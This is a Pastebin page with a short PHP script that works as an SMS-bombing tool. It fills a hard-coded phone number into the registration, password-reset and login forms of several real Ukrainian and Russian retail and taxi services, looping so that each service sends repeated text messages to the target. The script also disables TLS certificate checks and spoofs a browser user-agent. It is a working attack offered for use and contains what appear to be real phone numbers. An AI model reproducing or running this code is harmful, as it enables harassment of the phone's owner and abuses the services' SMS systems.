Advertisement
Guest User

Untitled

a guest
Feb 24th, 2018
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.33 KB | None | 0 0
  1. <?php
  2.     $phone = "+380977419037"; // НОМЕР ТЕЛЕФОНА
  3.  
  4.     if(!$phone) die("+380633787874"); else
  5.     for($i = 0; $i < 3; $i++) {
  6.          curl(
  7.             "http://comfy.ua/customer/account/createPost",
  8.             array(
  9.                 "registration_email" => "offpage.xyz_".rand(0, 999999)."@lol.kek",
  10.                 "registration_name" => "Баха",
  11.                 "registration_phone" => $phone
  12.             )
  13.         );
  14.         curl(
  15.             "http://comfy.ua/customer/account/restorePassword",
  16.             array(
  17.                 "username" => $phone
  18.             )
  19.         );
  20.     }  
  21.     curl(
  22.         "https://ru.gett.com/server/2_9/phone/create_user?lc=ru",
  23.         array(
  24.             "ph" => $phone,
  25.             "cc" => "RU",
  26.             "ip" => 0
  27.         )
  28.     );
  29.     curl("http://club.citrus.ua/personal/login/?ucheck=1&backurl=%2Fwelcome%2F100%2F&usl=5970942&phone=".$phone);  
  30.     function curl($url, $post = false) {
  31.         $ch = curl_init($url);
  32.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  33.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  34.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  35.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  36.         curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 AlexaToolbar/alxg-3.1');
  37.         if($post) {
  38.             curl_setopt($ch, CURLOPT_POST, 1);
  39.             curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  40.         }
  41.         $response = curl_exec($ch);
  42.         curl_close($ch);
  43.         return $response;
  44.     }
  45. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement